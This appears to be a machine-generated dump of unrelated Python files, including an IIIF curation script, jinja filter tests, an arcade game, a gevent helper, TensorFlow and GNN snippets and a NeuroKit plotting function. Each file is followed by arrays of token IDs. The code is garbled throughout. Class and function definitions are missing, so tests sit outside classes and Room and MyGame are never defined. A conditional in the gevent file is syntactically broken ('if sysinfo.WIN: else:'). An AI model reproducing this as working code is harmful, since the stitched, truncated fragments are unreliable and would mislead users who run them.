import urllib.request from bs4 import BeautifulSoup import csv import requests import os import json import time import glob files = glob.glob("/Users/nakamura/git/d_iiif/iiif/src/collections/nijl/data/json/*.json") for i in range(len(files)): file = files[i] file_id = file.split("/")[-1].replace(".json", "") opath = "/Users/nakamura/git/d_iiif/iiif/src/collections/nijl/data/curation/"+file_id+".json" if not os.path.exists(opath): fw = open(opath, 'w') curation_data = {} curation_uri = "curation:"+file_id+".json" with open(file) as f: try: df = json.load(f) except: continue anno_count = 1 if "sequences" in df: print(file) members = [] canvases = df["sequences"][0]["canvases"] for j in range(len(canvases)): canvas = canvases[j] if "otherContent" in canvas: id = canvas["otherContent"][0]["@id"] headers = {"content-type": "application/json"} # time.sleep(0.5) r = requests.get(id, headers=headers) data = r.json() print(id) resources = data["resources"] for resource in resources: member_id = resource["on"] res = resource["resource"] chars = res["chars"] member = { "@id": member_id, "@type": "sc:Canvas", "label": "[Annotation " + str(anno_count) + "]", "description": chars, "metadata": [ { "label": res["@type"], "value": chars } ] } anno_count += 1 members.append(member) if len(members) > 0: label = "" if "label" in df: label = df["label"] curation_data = { "@context": [ "http://iiif.io/api/presentation/2/context.json", "http://codh.rois.ac.jp/iiif/curation/1/context.json" ], "@type": "cr:Curation", "@id": curation_uri, "label": "Automatic curation by IIIF Converter", "selections": [ { "@id": curation_uri + "/range1", "@type": "sc:Range", "label": "Automatic curation by IIIF Converter", "members": members, "within": { "@id": df["@id"], "@type": "sc:Manifest", "label": label } } ] } json.dump(curation_data, fw, ensure_ascii=False, indent=4, sort_keys=True, separators=(',', ': '))
[ 11748, 2956, 297, 571, 13, 25927, 198, 6738, 275, 82, 19, 1330, 23762, 50, 10486, 198, 11748, 269, 21370, 198, 11748, 7007, 198, 11748, 28686, 198, 11748, 33918, 198, 11748, 640, 198, 11748, 15095, 198, 198, 16624, 796, 15095, 13, 4743,...
1.529832
2,380
from lib import get_itineraries import data if __name__ == '__main__': for itinerary in get_itineraries(data.sicily): print("#" * 24) print(itinerary) print("")
[ 6738, 9195, 1330, 651, 62, 270, 7274, 3166, 198, 11748, 1366, 198, 198, 361, 11593, 3672, 834, 6624, 705, 834, 12417, 834, 10354, 198, 220, 220, 220, 329, 45142, 560, 287, 651, 62, 270, 7274, 3166, 7, 7890, 13, 21383, 813, 2599, 198...
2.289157
83
import numpy as np from sawyer.mujoco.tasks.base import ComposableTask
[ 11748, 299, 32152, 355, 45941, 198, 198, 6738, 2497, 9860, 13, 76, 23577, 25634, 13, 83, 6791, 13, 8692, 1330, 29936, 540, 25714, 628, 628, 628 ]
2.961538
26
# coding: utf-8 from types import SimpleNamespace from datetime import datetime, timedelta from unittest.mock import patch from dateutil.relativedelta import relativedelta from jinja2 import Undefined, Markup from mock import Mock from app.jinja_filters import ( format_date, format_conditional_date, format_currency, get_currency_symbol, format_multilined_string, format_percentage, format_date_range, format_household_member_name, format_datetime, format_number_to_alphabetic_letter, format_unit, format_currency_for_input, format_number, format_unordered_list, format_unit_input_label, format_household_member_name_possessive, concatenated_list, calculate_years_difference, get_current_date, as_london_tz, max_value, min_value, get_question_title, get_answer_label, format_duration, calculate_offset_from_weekday_in_last_whole_week, format_date_custom, format_date_range_no_repeated_month_year, format_repeating_summary, format_address_list) from tests.app.app_context_test_case import AppContextTestCase def test_format_year_month_duration(self): with self.app_request_context('/'): self.assertEqual(format_duration({'years': 5, 'months': 4}), '5 years 4 months') self.assertEqual(format_duration({'years': 5, 'months': 0}), '5 years') self.assertEqual(format_duration({'years': 0, 'months': 4}), '4 months') self.assertEqual(format_duration({'years': 1, 'months': 1}), '1 year 1 month') self.assertEqual(format_duration({'years': 0, 'months': 0}), '0 months') def test_format_year_duration(self): with self.app_request_context('/'): self.assertEqual(format_duration({'years': 5}), '5 years') self.assertEqual(format_duration({'years': 1}), '1 year') self.assertEqual(format_duration({'years': 0}), '0 years') def test_format_month_duration(self): with self.app_request_context('/'): self.assertEqual(format_duration({'months': 5}), '5 months') self.assertEqual(format_duration({'months': 1}), '1 month') self.assertEqual(format_duration({'months': 0}), '0 months') def 
test_format_unordered_list(self): list_items = [['item 1', 'item 2']] formatted_value = format_unordered_list(self.autoescape_context, list_items) expected_value = '<ul><li>item 1</li><li>item 2</li></ul>' self.assertEqual(expected_value, formatted_value) def test_format_unordered_list_with_no_input(self): list_items = [] formatted_value = format_unordered_list(self.autoescape_context, list_items) self.assertEqual('', formatted_value) def test_format_unordered_list_with_empty_list(self): list_items = [[]] formatted_value = format_unordered_list(self.autoescape_context, list_items) self.assertEqual('', formatted_value) def test_max_value(self): # Given two_ints = (1, 2) # When max_of_two = max_value(*two_ints) # Then self.assertEqual(max_of_two, 2) def test_max_value_none(self): # Given one_int = (1, None) # When max_of_two = max_value(*one_int) # Then self.assertEqual(max_of_two, 1) def test_max_value_undefined(self): # Given args = ('foo', Undefined()) # When with self.assertRaises(Exception) as exception: max_value(*args) # Then self.assertIn( "Cannot determine maximum of incompatible types max(<class 'str'>," " <class 'jinja2.runtime.Undefined'>)", str(exception.exception)) def test_max_values_incompatible(self): # Given args = (1, 'abc') # When with self.assertRaises(Exception) as exception: max_value(*args) # Then self.assertIn( "Cannot determine maximum of incompatible types max(<class 'int'>," " <class 'str'>)", str(exception.exception)) def test_max_values_compatible(self): # Given args = (-1, True) # When max_of_two = max_value(*args) # Then self.assertEqual(max_of_two, True) def test_max_value_str(self): # Given two_str = ('a', 'abc') # When max_of_two = max_value(*two_str) # Then self.assertEqual(max_of_two, 'abc') def test_max_value_date(self): # Given now = datetime.utcnow() then = now - timedelta(seconds=60) two_dates = (then, now) # When max_of_two = max_value(*two_dates) # Then self.assertEqual(max_of_two, now) def test_min_value(self): # Given 
two_ints = (1, 2) # When min_of_two = min_value(*two_ints) # Then self.assertEqual(min_of_two, 1) def test_min_value_none(self): # Given one_int = (1, None) # When min_of_two = min_value(*one_int) # Then self.assertEqual(min_of_two, 1) def test_min_value_undefined(self): # Given args = ('foo', Undefined()) # When with self.assertRaises(Exception) as exception: min_value(*args) # Then self.assertIn( "Cannot determine minimum of incompatible types min(<class 'str'>," " <class 'jinja2.runtime.Undefined'>)", str(exception.exception)) def test_min_values_incompatible(self): # Given args = (1, 'abc') # When with self.assertRaises(Exception) as exception: min_value(*args) # Then self.assertIn( "Cannot determine minimum of incompatible types min(<class 'int'>," " <class 'str'>)", str(exception.exception)) def test_min_values_compatible(self): # Given args = (-1, True) # When min_of_two = min_value(*args) # Then self.assertEqual(min_of_two, -1) def test_min_value_str(self): # Given two_str = ('a', 'abc') # When min_of_two = min_value(*two_str) # Then self.assertEqual(min_of_two, 'a') def test_min_value_date(self): # Given now = datetime.utcnow() then = now - timedelta(seconds=60) two_dates = (then, now) # When min_of_two = min_value(*two_dates) # Then self.assertEqual(min_of_two, then) def test_get_question_title_with_title_value(self): # Given question_id = 'question' context = SimpleNamespace( parent={ 'question': { 'id': 'question', 'title': 'question_title' } } ) # When title = get_question_title(context, question_id) # Then self.assertEqual(title, 'question_title') def test_get_question_title_with_question_titles(self): # Given question_id = 'question' context = SimpleNamespace( parent={ 'question': { 'id': 'question' }, 'content': { 'question_titles': { 'question': 'default_question_title' } } } ) # When title = get_question_title(context, question_id) # Then self.assertEqual(title, 'default_question_title') def test_get_answer_label_with_answer_label(self): # Given 
answer_id = 'answer' question_id = 'question' context = SimpleNamespace( parent={ 'question': { 'id': 'question', 'answers': [{ 'id': 'answer', 'label': 'answer_label' }] } } ) # When answer_label = get_answer_label(context, answer_id, question_id) # Then self.assertEqual(answer_label, 'answer_label') def test_get_answer_label_with_no_answer_label_and_title(self): # Given answer_id = 'answer' question_id = 'question' context = SimpleNamespace( parent={ 'question': { 'id': 'question', 'title': 'question_title', 'answers': [{ 'id': 'answer' }] } } ) # When answer_label = get_answer_label(context, answer_id, question_id) # Then self.assertEqual(answer_label, 'question_title') def test_get_answer_label_with_no_answer_label_and_question_titles(self): # Given answer_id = 'answer' question_id = 'question' context = SimpleNamespace( parent={ 'question': { 'id': 'question', 'answers': [{ 'id': 'answer' }] }, 'content': { 'question_titles': { 'question': 'default_question_title' } } } ) # When answer_label = get_answer_label(context, answer_id, question_id) # Then self.assertEqual(answer_label, 'default_question_title') def test_offset_date_from_day(self): test_cases = [ # (Input Date, offset, day of week, expected output) ('2018-08-10', {}, 'SU', '2018-08-05'), # Friday outputs previous Sunday ('2018-08-05', {}, 'SU', '2018-07-29'), # Sunday outputs previous Sunday (Must be a full Sunday) ('2018-08-06', {}, 'SU', '2018-08-05'), # Monday outputs previous Sunday ('2018-08-06', {'days': -1}, 'SU', '2018-08-04'), # Previous sunday with -1 day offset ('2018-08-05', {'weeks': 1}, 'SU', '2018-08-05'), # Previous sunday with +1 month offset, back to input ('2018-08-10', {}, 'FR', '2018-08-03'), # Friday outputs previous Friday ('2018-08-10T13:32:20.365665', {}, 'FR', '2018-08-03'), # Ensure we can handle datetime input ('2018-08-10', {'weeks': 4}, 'FR', '2018-08-31'), # Friday outputs previous Friday + 4 weeks ('2018-08-10', {'bad_period': 4}, 'FR', '2018-08-03'), # Friday outputs 
previous Friday + nothing ('2018-08-10', {'years': 1}, 'FR', '2019-08-03'), # Friday outputs previous Friday + 1 year ('2018-08-10', {'years': 1, 'weeks': 1, 'days': 1}, 'FR', '2019-08-11'), # Friday outputs previous Friday + 1 year + 1 week + 1 day ] for case in test_cases: self.assertEqual(calculate_offset_from_weekday_in_last_whole_week(*case[0:3]), case[3])
[ 2, 19617, 25, 3384, 69, 12, 23, 198, 6738, 3858, 1330, 17427, 36690, 10223, 198, 198, 6738, 4818, 8079, 1330, 4818, 8079, 11, 28805, 12514, 198, 6738, 555, 715, 395, 13, 76, 735, 1330, 8529, 198, 198, 6738, 3128, 22602, 13, 2411, 26...
2.065426
5,319
import arcade import os SPRITE_SCALING = 0.5 SPRITE_NATIVE_SIZE = 128 SPRITE_SIZE = int(SPRITE_NATIVE_SIZE * SPRITE_SCALING) SCREEN_WIDTH = SPRITE_SIZE * 14 SCREEN_HEIGHT = SPRITE_SIZE * 10 MOVEMENT_SPEED = 5 COIN_SCALE = 0.7 def setup_room_1(): """ Create and return room 1. If your program gets large, you may want to separate this into different files. """ room = Room() """ Set up the game and initialize the variables. """ # Sprite lists room.wall_list = arcade.SpriteList() room.door_list = arcade.SpriteList() room.coin_list = arcade.SpriteList() room.smallpotion_list = arcade.SpriteList() room.bigpotion_list = arcade.SpriteList() for y in (0, SCREEN_HEIGHT - SPRITE_SIZE): # Loop for each box going across for x in range(0, SCREEN_WIDTH, SPRITE_SIZE): wall = arcade.Sprite("gravel_dirt.png", SPRITE_SCALING) wall.left = x wall.bottom = y room.wall_list.append(wall) # Create left and right column of boxes for x in (0, SCREEN_WIDTH - SPRITE_SIZE): # Loop for each box going across for y in range(SPRITE_SIZE, SCREEN_HEIGHT - SPRITE_SIZE, SPRITE_SIZE): # Skip making a block 4 and 5 blocks up on the right side if (y != SPRITE_SIZE * 4 and y != SPRITE_SIZE * 5) or x == 0: wall = arcade.Sprite("gravel_dirt.png", SPRITE_SCALING) wall.left = x wall.bottom = y room.wall_list.append(wall) for x in (0, SCREEN_WIDTH - SPRITE_SIZE): # Loop for each box going across for y in range(SPRITE_SIZE, SCREEN_HEIGHT - SPRITE_SIZE, SPRITE_SIZE): if not (y != SPRITE_SIZE * 4 and y != SPRITE_SIZE * 5) or x == 0: door = arcade.Sprite("fence.png", SPRITE_SCALING) door.left = x door.bottom = y room.door_list.append(door) wall = arcade.Sprite("gravel_dirt.png", SPRITE_SCALING) wall.left = 7 * SPRITE_SIZE wall.bottom = 5 * SPRITE_SIZE room.wall_list.append(wall) # If you want coins or monsters in a level, then add that code here. # Load the background image for this level. 
room.background = arcade.load_texture("g.png") for i in range(300,600,75): coin = arcade.Sprite("coin.png",COIN_SCALE) coin.center_x = i coin.center_y = 500 room.coin_list.append(coin) smallpotion = arcade.Sprite("big.png",0.05) smallpotion.center_x = 100 smallpotion.center_y = 900 room.smallpotion_list.append(smallpotion) return room def setup_room_2(): """ Create and return room 2. """ room = Room() """ Set up the game and initialize the variables. """ # Sprite lists room.door_list = arcade.SpriteList() room.wall_list = arcade.SpriteList() room.coin_list = arcade.SpriteList() room.smallpotion_list = arcade.SpriteList() room.bigpotion_list = arcade.SpriteList() # -- Set up the walls # Create bottom and top row of boxes # This y loops a list of two, the coordinate 0, and just under the top of window for y in (0, SCREEN_HEIGHT - SPRITE_SIZE): # Loop for each box going across for x in range(0, SCREEN_WIDTH, SPRITE_SIZE): wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING) wall.left = x wall.bottom = y room.wall_list.append(wall) # Create left and right column of boxes for x in (0, SCREEN_WIDTH - SPRITE_SIZE): # Loop for each box going across for y in range(SPRITE_SIZE, SCREEN_HEIGHT - SPRITE_SIZE, SPRITE_SIZE): # Skip making a block 4 and 5 blocks up if (y != SPRITE_SIZE * 4 and y != SPRITE_SIZE * 5) or x != 0: wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING) wall.left = x wall.bottom = y room.wall_list.append(wall) wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING) wall.left = 1 * SPRITE_SIZE wall.bottom = 6 * SPRITE_SIZE room.wall_list.append(wall) wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING) wall.left = 1 * SPRITE_SIZE wall.bottom = 3 * SPRITE_SIZE room.wall_list.append(wall) wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING) wall.left = 2 * SPRITE_SIZE wall.bottom = 5.5 * SPRITE_SIZE room.wall_list.append(wall) wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING) wall.left = 2 * SPRITE_SIZE wall.bottom = 3.5 * SPRITE_SIZE 
room.wall_list.append(wall) wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING) wall.left = 3 * SPRITE_SIZE wall.bottom = 3.5 * SPRITE_SIZE room.wall_list.append(wall) wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING) wall.left = 4 * SPRITE_SIZE wall.bottom = 3.5 * SPRITE_SIZE room.wall_list.append(wall) wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING) wall.left = 4 * SPRITE_SIZE wall.bottom = 4.5 * SPRITE_SIZE room.wall_list.append(wall) wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING) wall.left = 2 * SPRITE_SIZE wall.bottom = 5.5 * SPRITE_SIZE room.wall_list.append(wall) wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING) wall.left = 2 * SPRITE_SIZE wall.bottom = 6.5 * SPRITE_SIZE room.wall_list.append(wall) wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING) wall.left = 3 * SPRITE_SIZE wall.bottom = 6.5 * SPRITE_SIZE room.wall_list.append(wall) wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING) wall.left = 4 * SPRITE_SIZE wall.bottom = 6.5 * SPRITE_SIZE room.wall_list.append(wall) wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING) wall.left = 5 * SPRITE_SIZE wall.bottom = 6.5 * SPRITE_SIZE room.wall_list.append(wall) wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING) wall.left = 6 * SPRITE_SIZE wall.bottom = 6.5 * SPRITE_SIZE room.wall_list.append(wall) wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING) wall.left = 6 * SPRITE_SIZE wall.bottom = 5.5 * SPRITE_SIZE room.wall_list.append(wall) wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING) wall.left = 6 * SPRITE_SIZE wall.bottom = 4.5 * SPRITE_SIZE room.wall_list.append(wall) wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING) wall.left = 4 * SPRITE_SIZE wall.bottom = 2.5 * SPRITE_SIZE room.wall_list.append(wall) wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING) wall.left = 6 * SPRITE_SIZE wall.bottom =3.5 * SPRITE_SIZE room.wall_list.append(wall) wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING) wall.left = 6 * SPRITE_SIZE wall.bottom = 4.5 * 
SPRITE_SIZE room.wall_list.append(wall) wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING) wall.left = 6 * SPRITE_SIZE wall.bottom = 0.5 * SPRITE_SIZE room.wall_list.append(wall) wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING) wall.left = 6 * SPRITE_SIZE wall.bottom = 1.5 * SPRITE_SIZE room.wall_list.append(wall) wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING) wall.left = 7 * SPRITE_SIZE wall.bottom = 3.5 * SPRITE_SIZE room.wall_list.append(wall) wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING) wall.left = 7 * SPRITE_SIZE wall.bottom = 1.5 * SPRITE_SIZE room.wall_list.append(wall) wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING) wall.left = 8 * SPRITE_SIZE wall.bottom = 1.5 * SPRITE_SIZE room.wall_list.append(wall) wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING) wall.left = 8 * SPRITE_SIZE wall.bottom = 3.5 * SPRITE_SIZE room.wall_list.append(wall) wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING) wall.left = 9 * SPRITE_SIZE wall.bottom = 1.5 * SPRITE_SIZE room.wall_list.append(wall) wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING) wall.left = 10 * SPRITE_SIZE wall.bottom = 1.5 * SPRITE_SIZE room.wall_list.append(wall) wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING) wall.left = 10 * SPRITE_SIZE wall.bottom = 2.5 * SPRITE_SIZE room.wall_list.append(wall) wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING) wall.left = 10 * SPRITE_SIZE wall.bottom = 3.5 * SPRITE_SIZE room.wall_list.append(wall) wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING) wall.left = 10 * SPRITE_SIZE wall.bottom = 4.5 * SPRITE_SIZE room.wall_list.append(wall) wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING) wall.left = 8 * SPRITE_SIZE wall.bottom = 4.5 * SPRITE_SIZE room.wall_list.append(wall) wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING) wall.left = 10 * SPRITE_SIZE wall.bottom = 5.5 * SPRITE_SIZE room.wall_list.append(wall) wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING) wall.left = 10 * SPRITE_SIZE wall.bottom 
= 6.5 * SPRITE_SIZE room.wall_list.append(wall) wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING) wall.left = 9 * SPRITE_SIZE wall.bottom = 6.5 * SPRITE_SIZE room.wall_list.append(wall) wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING) wall.left = 8 * SPRITE_SIZE wall.bottom = 6.5 * SPRITE_SIZE room.wall_list.append(wall) wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING) wall.left = 8 * SPRITE_SIZE wall.bottom = 7.5 * SPRITE_SIZE room.wall_list.append(wall) wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING) wall.left = 8 * SPRITE_SIZE wall.bottom = 8 * SPRITE_SIZE room.wall_list.append(wall) room.background = arcade.load_texture("g.png") bigpotion = arcade.Sprite("small.png",0.05) bigpotion.center_x = 800 bigpotion.center_y = 100 room.bigpotion_list.append(bigpotion) return room def main(): """ Main method """ window = MyGame(SCREEN_WIDTH, SCREEN_HEIGHT) window.setup() arcade.run() if __name__ == "__main__": main()
[ 11748, 27210, 201, 198, 11748, 28686, 201, 198, 201, 198, 4303, 49, 12709, 62, 6173, 1847, 2751, 796, 657, 13, 20, 201, 198, 4303, 49, 12709, 62, 34259, 9306, 62, 33489, 796, 13108, 201, 198, 4303, 49, 12709, 62, 33489, 796, 493, 7,...
2.180004
4,811
# Copyright (c) 2018 gevent community # # Permission is hereby granted, free of charge, to any person obtaining a copy # of this software and associated documentation files (the "Software"), to deal # in the Software without restriction, including without limitation the rights # to use, copy, modify, merge, publish, distribute, sublicense, and/or sell # copies of the Software, and to permit persons to whom the Software is # furnished to do so, subject to the following conditions: # # The above copyright notice and this permission notice shall be included in # all copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR # IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE # AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER # LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, # OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN # THE SOFTWARE. from __future__ import absolute_import, print_function, division import os import unittest import re from . import sysinfo # Linux/OS X/BSD platforms can implement this by calling out to lsof if sysinfo.WIN: else: lsof_get_open_files = default_get_open_files try: # psutil import subprocess which on Python 3 imports selectors. # This can expose issues with monkey-patching. import psutil except ImportError: get_open_files = default_get_open_files get_number_open_files = default_get_number_open_files else: # If psutil is available (it is cross-platform) use that. # It is *much* faster than shelling out to lsof each time # (Running 14 tests takes 3.964s with lsof and 0.046 with psutil) # However, it still doesn't completely solve the issue on Windows: fds are reported # as -1 there, so we can't fully check those. def get_open_files(): """ Return a list of popenfile and pconn objects. 
Note that other than `fd`, they have different attributes. .. important:: If you want to find open sockets, on Windows and linux, it is important that the socket at least be listening (socket.listen(1)). Unlike the lsof implementation, this will only return sockets in a state like that. """ results = dict() process = psutil.Process() results['data'] = process.open_files() + process.connections('all') for x in results['data']: results[x.fd] = x results['data'] += ['From psutil', process] return results
[ 2, 15069, 357, 66, 8, 2864, 4903, 1151, 2055, 198, 2, 198, 2, 2448, 3411, 318, 29376, 7520, 11, 1479, 286, 3877, 11, 284, 597, 1048, 16727, 257, 4866, 198, 2, 286, 428, 3788, 290, 3917, 10314, 3696, 357, 1169, 366, 25423, 12340, 2...
3.173964
845
''' marathon_example.py performs a simple matrix multiply using 3 compute nodes ''' if __name__ == '__main__': from sys import argv import tensorflow as tf from dtforchestrator import * args = parseargs() with MultiprocessTensorFlowSession(args.taskname, args.n_tasks) as tfdevices: with tf.device(tfdevices.getDeviceSpec(1)): matrix1 = tf.constant([[3.],[3.]]) with tf.device(tfdevices.getDeviceSpec(2)): matrix2 = tf.constant([[3.,3.]]) with tf.device(tfdevices.getDeviceSpec(0)): matrix0 = tf.constant([[3.,3.]]) product1 = tf.matmul(matrix0, matrix1) product2 = tf.matmul(matrix2, matrix1) with tf.Session(tfdevices.localGRPC()) as sess: res = sess.run(product1) print res res = sess.run(product2) print res
[ 7061, 6, 198, 220, 220, 22336, 62, 20688, 13, 9078, 198, 220, 220, 220, 220, 220, 17706, 257, 2829, 17593, 29162, 1262, 513, 24061, 13760, 198, 7061, 6, 198, 198, 361, 11593, 3672, 834, 6624, 705, 834, 12417, 834, 10354, 198, 220, 2...
2.28841
371
''' Original code contributor: mentzera Article link: https://aws.amazon.com/blogs/big-data/building-a-near-real-time-discovery-platform-with-aws/ ''' import boto3 import json import twitter_to_es # from Examples.Demo.AWS_Related.TwitterStreamWithAWS.LambdaWithS3Trigger import \ # twitter_to_es from tweet_utils import \ get_tweet, id_field, get_tweet_mapping headers = {"Content-Type": "application/json"} s3 = boto3.client('s3') kinesis_client = boto3.client('kinesis') # dynamoDb_client = boto3.client('dynamodb') # Lambda execution starts here
[ 7061, 6, 198, 20556, 2438, 18920, 25, 6229, 89, 8607, 198, 14906, 2792, 25, 3740, 1378, 8356, 13, 33103, 13, 785, 14, 49096, 14, 14261, 12, 7890, 14, 16894, 12, 64, 12, 40093, 12, 5305, 12, 2435, 12, 67, 40821, 12, 24254, 12, 4480...
2.73301
206
from django.contrib.messages.constants import DEFAULT_LEVELS from user_messages.api import get_messages def messages(request): """ Return a lazy 'messages' context variable as well as 'DEFAULT_MESSAGE_LEVELS'. """ return { "messages": get_messages(request=request), "DEFAULT_MESSAGE_LEVELS": DEFAULT_LEVELS, }
[ 6738, 42625, 14208, 13, 3642, 822, 13, 37348, 1095, 13, 9979, 1187, 1330, 5550, 38865, 62, 2538, 18697, 50, 198, 198, 6738, 2836, 62, 37348, 1095, 13, 15042, 1330, 651, 62, 37348, 1095, 628, 198, 4299, 6218, 7, 25927, 2599, 198, 220, ...
2.451389
144
## Highest Score # Don't change the code below student_scores = input("Input a list of student scores: ").split() for n in range(0, len(student_scores)): student_scores[n] = int(student_scores[n]) print(student_scores) # Don't change the code above # Write your code below this row highest_score = 0 for scores in student_scores: if scores > highest_score: highest_score = scores print(f'The highest score is: {highest_score}') # functional code print(max(student_scores))
[ 2235, 41864, 15178, 198, 2, 220, 2094, 470, 1487, 262, 2438, 2174, 220, 198, 50139, 62, 1416, 2850, 796, 5128, 7203, 20560, 257, 1351, 286, 3710, 8198, 25, 366, 737, 35312, 3419, 198, 1640, 299, 287, 2837, 7, 15, 11, 18896, 7, 50139...
2.940828
169
import argparse from loader import MoleculeDataset from torch_geometric.data import DataLoader import torch import torch.nn as nn import torch.nn.functional as F import torch.optim as optim from tqdm import tqdm import numpy as np from model import GNN, GNN_graphpred from sklearn.metrics import roc_auc_score from splitters import scaffold_split, random_split import pandas as pd import os import shutil from tensorboardX import SummaryWriter criterion = nn.BCEWithLogitsLoss(reduction = "none") if __name__ == "__main__": main()
[ 11748, 1822, 29572, 198, 198, 6738, 40213, 1330, 25726, 23172, 27354, 292, 316, 198, 6738, 28034, 62, 469, 16996, 13, 7890, 1330, 6060, 17401, 198, 198, 11748, 28034, 198, 11748, 28034, 13, 20471, 355, 299, 77, 198, 11748, 28034, 13, 20...
3.107955
176
from jumpscale.core import exceptions
[ 6738, 18045, 38765, 13, 7295, 1330, 13269, 628, 628, 628, 628, 628, 628, 628, 628, 628, 628, 198 ]
3.222222
18
# -*- coding: utf-8 -*- import matplotlib.pyplot as plt import numpy as np import pandas as pd from ..events import events_plot from ..stats import standardize as nk_standardize def signal_plot( signal, sampling_rate=None, subplots=False, standardize=False, labels=None, **kwargs ): """Plot signal with events as vertical lines. Parameters ---------- signal : array or DataFrame Signal array (can be a dataframe with many signals). sampling_rate : int The sampling frequency of the signal (in Hz, i.e., samples/second). Needs to be supplied if the data should be plotted over time in seconds. Otherwise the data is plotted over samples. Defaults to None. subplots : bool If True, each signal is plotted in a subplot. standardize : bool If True, all signals will have the same scale (useful for visualisation). labels : str or list Defaults to None. **kwargs : optional Arguments passed to matplotlib plotting. Examples ---------- >>> import numpy as np >>> import pandas as pd >>> import neurokit2 as nk >>> >>> signal = nk.signal_simulate(duration=10, sampling_rate=1000) >>> nk.signal_plot(signal, sampling_rate=1000, color="red") >>> >>> data = pd.DataFrame({"Signal2": np.cos(np.linspace(start=0, stop=20, num=1000)), ... "Signal3": np.sin(np.linspace(start=0, stop=20, num=1000)), ... 
"Signal4": nk.signal_binarize(np.cos(np.linspace(start=0, stop=40, num=1000)))}) >>> nk.signal_plot(data, labels=['signal_1', 'signal_2', 'signal_3'], subplots=True) >>> nk.signal_plot([signal, data], standardize=True) """ # Sanitize format if isinstance(signal, list): try: for i in signal: len(i) except TypeError: signal = np.array(signal) if isinstance(signal, pd.DataFrame) is False: # If list is passed if isinstance(signal, list) or len(np.array(signal).shape) > 1: out = pd.DataFrame() for i, content in enumerate(signal): if isinstance(content, (pd.DataFrame, pd.Series)): out = pd.concat([out, content], axis=1, sort=True) else: out = pd.concat( [out, pd.DataFrame({"Signal" + str(i + 1): content})], axis=1, sort=True, ) signal = out # If vector is passed else: signal = pd.DataFrame({"Signal": signal}) # Copy signal signal = signal.copy() # Guess continuous and events columns continuous_columns = list(signal.columns.values) events_columns = [] for col in signal.columns: vector = signal[col] if vector.nunique() == 2: indices = np.where(vector == np.max(vector.unique())) if bool(np.any(np.diff(indices) == 1)) is False: events_columns.append(col) continuous_columns.remove(col) # Adjust for sampling rate if sampling_rate is not None: signal.index = signal.index / sampling_rate title_x = "Time (seconds)" else: title_x = "Time" # x_axis = np.linspace(0, signal.shape[0] / sampling_rate, signal.shape[0]) # x_axis = pd.DataFrame(x_axis, columns=["Time (s)"]) # signal = pd.concat([signal, x_axis], axis=1) # signal = signal.set_index("Time (s)") # Plot accordingly if len(events_columns) > 0: events = [] for col in events_columns: vector = signal[col] events.append(np.where(vector == np.max(vector.unique()))[0]) plot = events_plot(events, signal=signal[continuous_columns]) if sampling_rate is None and signal.index.is_integer(): plot.gca().set_xlabel("Samples") else: plot.gca().set_xlabel(title_x) else: # Aesthetics colors = [ "#1f77b4", "#ff7f0e", "#2ca02c", "#d62728", 
"#9467bd", "#8c564b", "#e377c2", "#7f7f7f", "#bcbd22", "#17becf", ] if len(continuous_columns) > len(colors): colors = plt.cm.viridis(np.linspace(0, 1, len(continuous_columns))) # Plot if standardize is True: signal[continuous_columns] = nk_standardize(signal[continuous_columns]) if subplots is True: _, axes = plt.subplots(nrows=len(continuous_columns), ncols=1, sharex=True, **kwargs) for ax, col, color in zip(axes, continuous_columns, colors): ax.plot(signal[col], c=color, **kwargs) else: plot = signal[continuous_columns].plot(subplots=False, sharex=True, **kwargs) if sampling_rate is None and signal.index.is_integer(): plt.xlabel("Samples") else: plt.xlabel(title_x) # Tidy legend locations and add labels if labels is None: labels = continuous_columns.copy() if isinstance(labels, str): n_labels = len([labels]) labels = [labels] elif isinstance(labels, list): n_labels = len(labels) if len(signal[continuous_columns].columns) != n_labels: raise ValueError( "NeuroKit error: signal_plot(): number of labels does not equal the number of plotted signals." ) if subplots is False: plt.legend(labels, loc=1) else: for i, label in enumerate(labels): axes[i].legend([label], loc=1)
